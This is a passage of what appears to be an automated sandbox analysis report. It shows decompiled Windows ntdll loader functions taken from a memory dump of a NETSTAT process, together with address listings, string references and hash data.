													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E02E82280(_t92, 0x2f586cc);
															_t94 = E02F39DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E02E961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x2f55c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E02E78A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x2f55c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x2f55c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E02EAF380(_t136, 0x2e41184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E02E82280(_t108, 0x2f586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E02E961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E02F39D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E02E7FFB0(_t118, _t156, 0x2f586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E02EA9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x02e78799
0x02e7879d
0x02e787a1
0x02e787a3
0x02e787a8
0x02e787c3
0x02e787c3
0x02e787c8
0x02e787d1
0x02e787d4
0x02e787d8
0x02e787e5
0x02e787ec
0x02ec9bfe
0x02ec9c00
0x02ec9c02
0x02ec9c08
0x02ec9c0d
0x02ec9c0f
0x02ec9c14
0x02ec9c2d
0x02ec9c32
0x02ec9c37
0x02ec9c3a
0x02ec9c3c
0x02ec9c42
0x02ec9c42
0x02ec9c3c
0x02ec9c02
0x02e787da
0x02e787df
0x02e787e3
0x00000000
0x00000000
0x02e787e3
0x02e787f2
0x00000000
0x02e787fb
0x02e787fd
0x02e787fe
0x02e7880e
0x02e7880f
0x02e78810
0x02e78814
0x02e7881a
0x02e7881c
0x02e7881f
0x02e78821
0x02e78822
0x02e78824
0x02e78826
0x02e7882c
0x02e7882e
0x02ec9c48
0x02ec9c48
0x02e78834
0x02e78834
0x02e78837
0x00000000
0x00000000
0x02e78837
0x02e7882e
0x02e7883d
0x02e78840
0x02e78843
0x02e78846
0x02e78849
0x02e7884c
0x02e7884e
0x02e78850
0x02e78852
0x02e78854
0x02e78857
0x02e788b4
0x02e788b6
0x02e788b6
0x02e78859
0x02e78859
0x02e78859
0x02e78861
0x02e78866
0x02e7886a
0x02e7893d
0x02e78941
0x00000000
0x02e78947
0x02e78947
0x02e7894a
0x02e7894c
0x00000000
0x02e78952
0x02e78955
0x02e7895a
0x02e7895d
0x02e7895d
0x02e7895f
0x02e78961
0x02e78961
0x02e78968
0x00000000
0x00000000
0x02e7896a
0x02e7896b
0x02e7896e
0x00000000
0x02e78970
0x02e78970
0x02e78970
0x02e78970
0x02e78972
0x02e78972
0x02e78974
0x00000000
0x02e7897a
0x02e7897a
0x02e7897d
0x00000000
0x02e78983
0x02ec9c65
0x02ec9c6d
0x02ec9c72
0x02ec9c75
0x02ec9c75
0x02ec9c82
0x02ec9c86
0x02ec9c87
0x02ec9c88
0x02ec9c89
0x02ec9c8c
0x02ec9c90
0x02ec9c95
0x02ec9c97
0x02ec9ca0
0x02ec9ca3
0x02ec9ca9
0x02ec9ca9
0x00000000
0x02ec9ca9
0x02ec9ca3
0x00000000
0x02ec9c97
0x02e7897d
0x00000000
0x02e78974
0x02e78988
0x02e78992
0x02e78996
0x00000000
0x02e78996
0x02e7894c
0x00000000
0x02e78870
0x02e7887b
0x02e7887d
0x02e7887f
0x02e78881
0x02e78884
0x02e78884
0x02e78886
0x02e78889
0x02e7888c
0x02e7888e
0x02e78891
0x02e78891
0x02e78898
0x00000000
0x00000000
0x02e7889a
0x02e7889b
0x02e7889e
0x00000000
0x00000000
0x02e788a0
0x02e788a8
0x02e788b0
0x02e788b2
0x02e788d3
0x02e788d5
0x00000000
0x02e788d7
0x02e788db
0x02e788dc
0x02e788e0
0x02e788e8
0x02e788ee
0x02e788f0
0x02e788f3
0x02e788fc
0x02e78901
0x02e78906
0x02e7890c
0x02e7890c
0x02e7890f
0x02e78916
0x02e78917
0x02e78918
0x02e78919
0x02e7891a
0x02e7891f
0x02e78921
0x02ec9c52
0x02ec9c55
0x02ec9c5b
0x02ec9cac
0x02ec9cc0
0x02ec9cc0
0x02ec9c55
0x02e78927
0x02e78927
0x02e7892f
0x02e78933
0x00000000
0x02e788f5
0x02e788f5
0x00000000
0x02e788f7
0x02e788f7
0x02e788fa
0x00000000
0x00000000
0x00000000
0x00000000
0x02e788fa
0x02e788f5
0x02e788f3
0x00000000
0x02e788d5
0x00000000
0x02e788b2
0x02e788c9
0x00000000
0x02e788c9
0x02e7887f
0x02e7886a
0x02e78857
0x02e78852
0x02e788bf
0x02e788bf
0x02e787aa
0x02e787ad
0x02e787ae
0x02e787b4
0x02e787b5
0x02e787b6
0x02e787b8
0x02e787bd
0x02e787c1
0x02e787f4
0x02e787fa
0x00000000
0x00000000
0x00000000
0x02e787c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 02EC9C28
LdrpDoPostSnapWork, xrefs: 02EC9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02EC9C18

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 91b092bf5eeae5118344521e968bb0e5581d725c9287b794b850558b8c193644
Instruction ID: 46df25e4623cd793bb57819d02e83521f2394b02202d5d12c3ab6de302db6d71
Opcode Fuzzy Hash: 91b092bf5eeae5118344521e968bb0e5581d725c9287b794b850558b8c193644
Instruction Fuzzy Hash: A0913A31A80219DFEF18DF58C488ABAB7B6FF54318B54E069ED06AB241D730ED01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E77E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E02E77E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E02E7CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E02E6C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x2f55780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E02EE5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x2f55780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E02E87D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02E87D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E02EE7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E02E87D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02E87D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E02EE7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E02E9A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E02E6B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x02e77e4c
0x02e77e50
0x02e77e55
0x02e77e58
0x02e77e5d
0x02e77e71
0x02e77f33
0x02e77e77
0x02e77e77
0x02e77e79
0x02e77e79
0x02e77e7e
0x02e77f45
0x02ec9848
0x00000000
0x02ec9848
0x02e77f4e
0x02e77f53
0x02e77f5a
0x00000000
0x00000000
0x02ec985a
0x02ec9862
0x02ec9866
0x00000000
0x02ec986c
0x00000000
0x02ec986c
0x02e77e84
0x02e77e84
0x02e77e8d
0x02ec9871
0x02e77eb8
0x02e77ec0
0x02e77ec0
0x02e77e9a
0x02ec987e
0x00000000
0x00000000
0x02ec9884
0x02ec988b
0x02ec98a7
0x02ec98ac
0x02ec98b1
0x02ec98b6
0x02ec98b8
0x02ec98b8
0x02ec98b9
0x00000000
0x02ec98b9
0x02e77ea0
0x02e77ea7
0x00000000
0x00000000
0x02e77eac
0x02e77eb1
0x02e77ec6
0x02e77ed0
0x02ec98cc
0x02e77ed6
0x02e77ed6
0x02e77ed6
0x02e77ede
0x02e77ee3
0x02ec98e3
0x02ec98f0
0x02ec9902
0x02ec98f2
0x02ec98fb
0x02ec98fb
0x02ec9907
0x02ec991d
0x02ec991d
0x02ec9907
0x02ec98e3
0x02e77ef0
0x02e77f14
0x02e77f14
0x02e77f1e
0x02ec9946
0x02e77f24
0x02e77f24
0x02e77f24
0x02e77f2c
0x02ec996a
0x02ec9975
0x02ec9975
0x02ec997e
0x02ec9993
0x02ec9993
0x02ec997e
0x00000000
0x02e77ef2
0x02e77efc
0x02e77f0a
0x02e77f0e
0x02ec9933
0x00000000
0x02ec9933
0x00000000
0x02e77f0e
0x00000000
0x00000000
0x00000000
0x02e77eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 02EC98A2
LdrpCompleteMapModule, xrefs: 02EC9898
Could not validate the crypto signature for DLL %wZ, xrefs: 02EC9891

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 8552ca1f88205a66dbda155f50210acc3016a12b9ba764d8e72cba44d9a65d6a
Instruction ID: 5e05bf576fb2444ed4b8400aa38b7b55267e8c3552e660b048a54c506938e822
Opcode Fuzzy Hash: 8552ca1f88205a66dbda155f50210acc3016a12b9ba764d8e72cba44d9a65d6a
Instruction Fuzzy Hash: A45115316847459BEB25CBA8CA44B7ABBE4FB01318F14A5ADE8519B3E2D730ED01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E6E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02E6E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E02E6F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E02EA95D0();
						}
						if(_t78 != 0) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E02EAFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E02EABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E02EA9600();
					if(_t97 < 0) {
						goto L6;
					}
					E02EABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L02E6F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E02EABB40(_t83, _t102 + 0x24, _t78);
								if(L02E743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E02EABB40(_t84, _t102 + 0x24, _t94);
									if(L02E743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x02e6e620
0x02e6e628
0x02e6e62f
0x02e6e631
0x02e6e635
0x02e6e637
0x02e6e63e
0x02ec5503
0x02ec5503
0x02e6e64c
0x02e6e64c
0x02e6e651
0x00000000
0x00000000
0x02e6e661
0x02e6e665
0x02ec542a
0x02e6e715
0x02e6e71a
0x02e6e71c
0x02e6e720
0x02e6e720
0x02e6e727
0x02e6e736
0x02e6e736
0x02e6e743
0x02e6e743
0x02e6e673
0x02e6e678
0x02e6e67d
0x02e6e682
0x02e6e685
0x02e6e692
0x02e6e69b
0x02e6e6a3
0x02e6e6ad
0x02e6e6b1
0x02e6e6b2
0x02e6e6bb
0x02e6e6bf
0x02e6e6c0
0x02e6e6c8
0x02e6e6cc
0x02e6e6d5
0x02e6e6d9
0x00000000
0x00000000
0x02e6e6e5
0x02e6e6ea
0x02e6e6f9
0x02e6e70b
0x02e6e70f
0x02ec5439
0x02ec545e
0x02ec545e
0x00000000
0x02ec545e
0x02ec543b
0x02ec543e
0x02ec5440
0x02ec5445
0x02ec5472
0x02ec5475
0x02ec548d
0x02ec5493
0x02ec54a9
0x00000000
0x00000000
0x02ec54ab
0x02ec54b4
0x02ec54bc
0x02ec54c8
0x02ec54de
0x02ec54fb
0x02ec54e0
0x02ec54e6
0x02ec54eb
0x02ec54eb
0x02ec54de
0x00000000
0x02ec54bc
0x02ec5477
0x02ec547a
0x02ec5480
0x02ec5483
0x02ec5486
0x02ec548b
0x00000000
0x00000000
0x00000000
0x02ec548b
0x00000000
0x00000000
0x00000000
0x00000000
0x02ec5447
0x02ec5447
0x02ec5447
0x02ec5447
0x02ec544e
0x00000000
0x00000000
0x02ec5450
0x02ec5452
0x02ec5455
0x02ec545a
0x00000000
0x00000000
0x00000000
0x02ec545c
0x02ec546a
0x02ec546d
0x02ec546f
0x00000000
0x02ec546f
0x02e6e70f

Strings

@, xrefs: 02E6E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02E6E68C
InstallLanguageFallback, xrefs: 02E6E6DB

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: fefc130e8b256071b2c87a8617b9adf0864743fbb05a1d42bebb718a1add7deb
Instruction ID: 255c6e681519eebd143529f1e8bbbff2e25f1dc6976be4c1b8a29b8748c2b8fe
Opcode Fuzzy Hash: fefc130e8b256071b2c87a8617b9adf0864743fbb05a1d42bebb718a1add7deb
Instruction Fuzzy Hash: 6951E3755883019BC710DF64D454BBBB3E8BF88758F54992EF986E7240E730E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E7D5E0, Relevance: 2.9, Strings: 2, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E02E7D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x2f5d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E02E76600(0x2f552d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x2f57b9c; // 0x0
							_t281 = L02E84620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E02EAF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x2f57b90; // 0x775e0000
								if(_t384 == 0) {
									_t353 =  *0x2f57b8c; // 0x3f29e0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x3f2a90
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E02E82280(_t200, 0x2f584d8);
									_t277 =  *0x2f585f4; // 0x3f3228
									_t351 =  *0x2f585f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74470000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x3f3270
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x3f31c0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x3f3270
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x3f3a98
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E02E7FFB0(_t287, _t353, 0x2f584d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E02EBCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E02E76600(0x2f552d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E02E77926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x2f5b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E02EEE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x2f58472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x2f5b218; // 0x0
														asm("ror edi, cl");
														 *0x2f5b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
